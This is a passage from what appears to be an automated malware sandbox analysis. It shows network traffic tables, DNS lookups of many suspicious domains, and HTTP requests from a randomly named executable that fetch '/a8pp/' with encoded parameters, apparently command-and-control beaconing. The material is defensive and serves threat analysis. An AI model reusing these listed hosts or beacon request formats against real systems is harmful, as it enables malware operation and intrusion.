                                        Jun 4, 2024 14:40:41.252587080 CEST4988280192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:41.419498920 CEST8049882192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:41.424671888 CEST8049882192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:41.424685001 CEST8049882192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:41.424884081 CEST4988280192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:42.767422915 CEST4988280192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:43.785461903 CEST4988380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:43.953958988 CEST8049883192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:43.954214096 CEST4988380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:43.956228018 CEST4988380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:44.123040915 CEST8049883192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:44.124578953 CEST8049883192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:44.124620914 CEST8049883192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:44.124635935 CEST8049883192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:40:44.124934912 CEST4988380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:44.129301071 CEST4988380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:44.296221018 CEST8049883192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:41:09.014807940 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.239082098 CEST804988891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:09.239249945 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.241153002 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.465466022 CEST804988891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:09.465480089 CEST804988891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:09.465876102 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.468352079 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.692492008 CEST804988891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:14.482065916 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.599726915 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:14.599977016 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.601763010 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.719410896 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:14.747421980 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:14.747498035 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:14.747776985 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.750180960 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.867810011 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:19.761286974 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.070470095 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:20.070770025 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.072335958 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.381417990 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:20.382594109 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:20.382685900 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:20.383126974 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.385232925 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.694315910 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:25.401048899 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:25.627258062 CEST804989191.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:25.627441883 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:25.629314899 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:25.855757952 CEST804989191.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:25.855772018 CEST804989191.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:25.856251955 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:25.858436108 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:26.084593058 CEST804989191.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:30.868065119 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:30.998502016 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:30.998737097 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.000834942 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.131365061 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:31.206630945 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:31.206644058 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:31.207026958 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.207264900 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:31.207509041 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.211359024 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.341762066 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:37.069681883 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.237261057 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:37.237709999 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.239459038 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.407226086 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:37.422058105 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:37.422127962 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:37.422591925 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.424434900 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.591567039 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:42.427877903 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:42.653006077 CEST804989464.190.62.22192.168.11.30
                                        Jun 4, 2024 14:41:42.653249979 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:42.655119896 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:42.881182909 CEST804989464.190.62.22192.168.11.30
                                        Jun 4, 2024 14:41:42.881198883 CEST804989464.190.62.22192.168.11.30
                                        Jun 4, 2024 14:41:42.881534100 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:42.883366108 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:43.108449936 CEST804989464.190.62.22192.168.11.30
                                        Jun 4, 2024 14:41:47.895430088 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.026066065 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.026571989 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.028067112 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.158675909 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.203505993 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.203603029 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.203670979 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.203948975 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.204235077 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.204466105 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.207215071 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.337804079 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:53.222913027 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.433830023 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.434117079 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.435539007 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.646270037 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.649365902 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.649462938 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.649477005 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.649859905 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.653150082 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.863826990 CEST8049897217.70.184.50192.168.11.30

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jun 4, 2024 14:34:03.091375113 CEST5243253192.168.11.301.1.1.1
                                        Jun 4, 2024 14:34:03.227344036 CEST53524321.1.1.1192.168.11.30
                                        Jun 4, 2024 14:34:03.879163980 CEST6348753192.168.11.301.1.1.1
                                        Jun 4, 2024 14:34:04.010370016 CEST53634871.1.1.1192.168.11.30
                                        Jun 4, 2024 14:34:30.705137014 CEST5898753192.168.11.301.1.1.1
                                        Jun 4, 2024 14:34:30.843302011 CEST53589871.1.1.1192.168.11.30
                                        Jun 4, 2024 14:34:46.350102901 CEST6065753192.168.11.301.1.1.1
                                        Jun 4, 2024 14:34:46.524755001 CEST53606571.1.1.1192.168.11.30
                                        Jun 4, 2024 14:34:59.737596035 CEST5718453192.168.11.301.1.1.1
                                        Jun 4, 2024 14:35:00.751009941 CEST5718453192.168.11.309.9.9.9
                                        Jun 4, 2024 14:35:01.277491093 CEST53571841.1.1.1192.168.11.30
                                        Jun 4, 2024 14:35:15.437690020 CEST5940153192.168.11.301.1.1.1
                                        Jun 4, 2024 14:35:15.788655043 CEST53594011.1.1.1192.168.11.30
                                        Jun 4, 2024 14:35:29.528851032 CEST6135953192.168.11.301.1.1.1
                                        Jun 4, 2024 14:35:29.783942938 CEST53613591.1.1.1192.168.11.30
                                        Jun 4, 2024 14:35:43.119731903 CEST5186753192.168.11.301.1.1.1
                                        Jun 4, 2024 14:35:43.322701931 CEST53518671.1.1.1192.168.11.30
                                        Jun 4, 2024 14:35:56.803975105 CEST5289253192.168.11.301.1.1.1
                                        Jun 4, 2024 14:35:57.026128054 CEST53528921.1.1.1192.168.11.30
                                        Jun 4, 2024 14:36:10.754286051 CEST6317253192.168.11.301.1.1.1
                                        Jun 4, 2024 14:36:10.992259979 CEST53631721.1.1.1192.168.11.30
                                        Jun 4, 2024 14:36:24.375941038 CEST5903153192.168.11.301.1.1.1
                                        Jun 4, 2024 14:36:24.861519098 CEST53590311.1.1.1192.168.11.30
                                        Jun 4, 2024 14:36:38.528918028 CEST6523653192.168.11.301.1.1.1
                                        Jun 4, 2024 14:36:38.663223028 CEST53652361.1.1.1192.168.11.30
                                        Jun 4, 2024 14:36:46.714273930 CEST5277253192.168.11.301.1.1.1
                                        Jun 4, 2024 14:36:46.845098972 CEST53527721.1.1.1192.168.11.30
                                        Jun 4, 2024 14:36:54.900398970 CEST5684353192.168.11.301.1.1.1
                                        Jun 4, 2024 14:36:55.120143890 CEST53568431.1.1.1192.168.11.30
                                        Jun 4, 2024 14:37:08.850363016 CEST5142353192.168.11.301.1.1.1
                                        Jun 4, 2024 14:37:09.318007946 CEST53514231.1.1.1192.168.11.30
                                        Jun 4, 2024 14:37:22.722455978 CEST5319453192.168.11.301.1.1.1
                                        Jun 4, 2024 14:37:22.900141001 CEST53531941.1.1.1192.168.11.30
                                        Jun 4, 2024 14:37:36.624947071 CEST5393653192.168.11.301.1.1.1
                                        Jun 4, 2024 14:37:36.940116882 CEST53539361.1.1.1192.168.11.30
                                        Jun 4, 2024 14:37:50.403203011 CEST6212853192.168.11.301.1.1.1
                                        Jun 4, 2024 14:37:51.415509939 CEST6212853192.168.11.309.9.9.9
                                        Jun 4, 2024 14:37:52.398164034 CEST53621281.1.1.1192.168.11.30
                                        Jun 4, 2024 14:37:53.712831020 CEST53621289.9.9.9192.168.11.30
                                        Jun 4, 2024 14:40:02.934026003 CEST5525853192.168.11.301.1.1.1
                                        Jun 4, 2024 14:40:03.056389093 CEST53552581.1.1.1192.168.11.30
                                        Jun 4, 2024 14:40:11.122392893 CEST6412453192.168.11.301.1.1.1
                                        Jun 4, 2024 14:40:11.258658886 CEST53641241.1.1.1192.168.11.30
                                        Jun 4, 2024 14:40:19.322134018 CEST6083353192.168.11.301.1.1.1
                                        Jun 4, 2024 14:40:19.453012943 CEST53608331.1.1.1192.168.11.30
                                        Jun 4, 2024 14:40:27.507982016 CEST6189153192.168.11.301.1.1.1
                                        Jun 4, 2024 14:40:27.628329039 CEST53618911.1.1.1192.168.11.30
                                        Jun 4, 2024 14:40:49.143780947 CEST6377353192.168.11.301.1.1.1
                                        Jun 4, 2024 14:40:49.858120918 CEST53637731.1.1.1192.168.11.30
                                        Jun 4, 2024 14:41:03.734719038 CEST5613953192.168.11.301.1.1.1
                                        Jun 4, 2024 14:41:04.010078907 CEST53561391.1.1.1192.168.11.30
                                        Jun 4, 2024 14:41:50.855720997 CEST5230353192.168.11.301.1.1.1
                                        Jun 4, 2024 14:41:58.657555103 CEST6501953192.168.11.301.1.1.1
                                        Jun 4, 2024 14:41:58.796785116 CEST53650191.1.1.1192.168.11.30
                                        Jun 4, 2024 14:42:03.813621998 CEST6422353192.168.11.301.1.1.1
                                        Jun 4, 2024 14:42:04.042958975 CEST53642231.1.1.1192.168.11.30
                                        Jun 4, 2024 14:42:09.719599009 CEST5710953192.168.11.301.1.1.1
                                        Jun 4, 2024 14:42:09.861929893 CEST53571091.1.1.1192.168.11.30

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jun 4, 2024 14:34:03.091375113 CEST192.168.11.301.1.1.10x73bcStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:34:03.879163980 CEST192.168.11.301.1.1.10xe292Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:34:30.705137014 CEST192.168.11.301.1.1.10x8bccStandard query (0)www.peptily.shopA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:34:46.350102901 CEST192.168.11.301.1.1.10xc02cStandard query (0)www.blissfulbooks.onlineA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:34:59.737596035 CEST192.168.11.301.1.1.10xf153Standard query (0)www.click-advertising.netA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:00.751009941 CEST192.168.11.309.9.9.90xf153Standard query (0)www.click-advertising.netA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:15.437690020 CEST192.168.11.301.1.1.10xa3a9Standard query (0)www.continentaloilandgas.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:29.528851032 CEST192.168.11.301.1.1.10x9b3eStandard query (0)www.barrettdigitalart.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:43.119731903 CEST192.168.11.301.1.1.10x8a37Standard query (0)www.astralavenue.xyzA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:56.803975105 CEST192.168.11.301.1.1.10x260bStandard query (0)www.nurse-job2535.lifeA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:10.754286051 CEST192.168.11.301.1.1.10xa9d5Standard query (0)www.shootprecious.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:24.375941038 CEST192.168.11.301.1.1.10x1dc0Standard query (0)www.cyberpsychsecurity.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:38.528918028 CEST192.168.11.301.1.1.10x6500Standard query (0)www.gcashservice247.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:46.714273930 CEST192.168.11.301.1.1.10xc2f3Standard query (0)www.likbez22.storeA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:54.900398970 CEST192.168.11.301.1.1.10xbf93Standard query (0)www.towelhoodie.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:08.850363016 CEST192.168.11.301.1.1.10xcb5cStandard query (0)www.seductionsessions.co.ukA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:22.722455978 CEST192.168.11.301.1.1.10x5b48Standard query (0)www.calmparents.usA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:36.624947071 CEST192.168.11.301.1.1.10x4330Standard query (0)www.tintasmaiscor.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:50.403203011 CEST192.168.11.301.1.1.10xee2cStandard query (0)www.vgjimei.icuA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:51.415509939 CEST192.168.11.309.9.9.90xee2cStandard query (0)www.vgjimei.icuA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:02.934026003 CEST192.168.11.301.1.1.10xe0cbStandard query (0)www.gcashservice247.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:11.122392893 CEST192.168.11.301.1.1.10x78e3Standard query (0)www.cookwarecentrall.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:19.322134018 CEST192.168.11.301.1.1.10xa552Standard query (0)www.spazisostenibili.orgA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:27.507982016 CEST192.168.11.301.1.1.10xbddcStandard query (0)www.weeveno.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:49.143780947 CEST192.168.11.301.1.1.10x3330Standard query (0)www.issoweb.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:41:03.734719038 CEST192.168.11.301.1.1.10x1d2aStandard query (0)www.shigi.orgA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:41:50.855720997 CEST192.168.11.301.1.1.10x52b2Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:41:58.657555103 CEST192.168.11.301.1.1.10xd7b3Standard query (0)www.gcashservice247.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:42:03.813621998 CEST192.168.11.301.1.1.10x2241Standard query (0)www.digitoxmarketing.comA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:42:09.719599009 CEST192.168.11.301.1.1.10xf30aStandard query (0)www.newstantonlocksmith.usA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jun 4, 2024 14:34:03.227344036 CEST1.1.1.1192.168.11.300x73bcNo error (0)drive.google.com142.250.217.174A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:34:04.010370016 CEST1.1.1.1192.168.11.300xe292No error (0)drive.usercontent.google.com142.250.217.193A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:34:30.843302011 CEST1.1.1.1192.168.11.300x8bccNo error (0)www.peptily.shopparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:34:30.843302011 CEST1.1.1.1192.168.11.300x8bccNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:34:46.524755001 CEST1.1.1.1192.168.11.300xc02cNo error (0)www.blissfulbooks.onlineconnect.hostinger.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:34:46.524755001 CEST1.1.1.1192.168.11.300xc02cNo error (0)connect.hostinger.com34.120.137.41A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:01.277491093 CEST1.1.1.1192.168.11.300xf153No error (0)www.click-advertising.net160.124.114.188A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:15.788655043 CEST1.1.1.1192.168.11.300xa3a9No error (0)www.continentaloilandgas.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:35:15.788655043 CEST1.1.1.1192.168.11.300xa3a9No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:29.783942938 CEST1.1.1.1192.168.11.300x9b3eNo error (0)www.barrettdigitalart.com172.67.205.56A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:29.783942938 CEST1.1.1.1192.168.11.300x9b3eNo error (0)www.barrettdigitalart.com104.21.52.228A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:43.322701931 CEST1.1.1.1192.168.11.300x8a37No error (0)www.astralavenue.xyz162.0.237.22A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:35:57.026128054 CEST1.1.1.1192.168.11.300x260bNo error (0)www.nurse-job2535.life64.190.62.22A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:10.992259979 CEST1.1.1.1192.168.11.300xa9d5No error (0)www.shootprecious.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:36:10.992259979 CEST1.1.1.1192.168.11.300xa9d5No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:24.861519098 CEST1.1.1.1192.168.11.300x1dc0No error (0)www.cyberpsychsecurity.comwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:36:24.861519098 CEST1.1.1.1192.168.11.300x1dc0No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:38.663223028 CEST1.1.1.1192.168.11.300x6500Name error (3)www.gcashservice247.comnonenoneA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:46.845098972 CEST1.1.1.1192.168.11.300xc2f3Name error (3)www.likbez22.storenonenoneA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:36:55.120143890 CEST1.1.1.1192.168.11.300xbf93No error (0)www.towelhoodie.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:36:55.120143890 CEST1.1.1.1192.168.11.300xbf93No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:09.318007946 CEST1.1.1.1192.168.11.300xcb5cNo error (0)www.seductionsessions.co.uk23.82.12.29A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:22.900141001 CEST1.1.1.1192.168.11.300x5b48No error (0)www.calmparents.usparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:37:22.900141001 CEST1.1.1.1192.168.11.300x5b48No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:36.940116882 CEST1.1.1.1192.168.11.300x4330No error (0)www.tintasmaiscor.comtintasmaiscor.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:37:36.940116882 CEST1.1.1.1192.168.11.300x4330No error (0)tintasmaiscor.com162.240.81.18A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:52.398164034 CEST1.1.1.1192.168.11.300xee2cNo error (0)www.vgjimei.icu02.32.jtrhc.funCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:37:52.398164034 CEST1.1.1.1192.168.11.300xee2cNo error (0)02.32.jtrhc.fun192.207.62.21A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:37:53.712831020 CEST9.9.9.9192.168.11.300xee2cNo error (0)www.vgjimei.icu02.32.jtrhc.funCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:37:53.712831020 CEST9.9.9.9192.168.11.300xee2cNo error (0)02.32.jtrhc.fun192.207.62.21A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:03.056389093 CEST1.1.1.1192.168.11.300xe0cbName error (3)www.gcashservice247.comnonenoneA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:11.258658886 CEST1.1.1.1192.168.11.300x78e3Name error (3)www.cookwarecentrall.comnonenoneA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:19.453012943 CEST1.1.1.1192.168.11.300xa552Name error (3)www.spazisostenibili.orgnonenoneA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:27.628329039 CEST1.1.1.1192.168.11.300xbddcName error (3)www.weeveno.comnonenoneA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:40:49.858120918 CEST1.1.1.1192.168.11.300x3330No error (0)www.issoweb.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:40:49.858120918 CEST1.1.1.1192.168.11.300x3330No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:40:49.858120918 CEST1.1.1.1192.168.11.300x3330No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:41:04.010078907 CEST1.1.1.1192.168.11.300x1d2aName error (3)www.shigi.orgnonenoneA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:41:50.973310947 CEST1.1.1.1192.168.11.300x52b2No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:41:58.796785116 CEST1.1.1.1192.168.11.300xd7b3Name error (3)www.gcashservice247.comnonenoneA (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:42:04.042958975 CEST1.1.1.1192.168.11.300x2241No error (0)www.digitoxmarketing.comdigitoxmarketing.comCNAME (Canonical name)IN (0x0001)false
                                        Jun 4, 2024 14:42:04.042958975 CEST1.1.1.1192.168.11.300x2241No error (0)digitoxmarketing.com104.194.9.31A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:42:09.861929893 CEST1.1.1.1192.168.11.300xf30aNo error (0)www.newstantonlocksmith.us104.21.63.61A (IP address)IN (0x0001)false
                                        Jun 4, 2024 14:42:09.861929893 CEST1.1.1.1192.168.11.300xf30aNo error (0)www.newstantonlocksmith.us172.67.143.223A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • drive.google.com
                                        • drive.usercontent.google.com
                                        • www.peptily.shop
                                        • www.blissfulbooks.online
                                        • www.click-advertising.net
                                        • www.continentaloilandgas.com
                                        • www.barrettdigitalart.com
                                        • www.astralavenue.xyz
                                        • www.nurse-job2535.life
                                        • www.shootprecious.com
                                        • www.cyberpsychsecurity.com
                                        • www.towelhoodie.com
                                        • www.seductionsessions.co.uk
                                        • www.calmparents.us
                                        • www.tintasmaiscor.com
                                        • www.vgjimei.icu

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.11.304979491.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:34:31.075062037 CEST466OUTGET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.peptily.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:34:31.299433947 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.11.304979534.120.137.41807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:34:46.646238089 CEST757OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
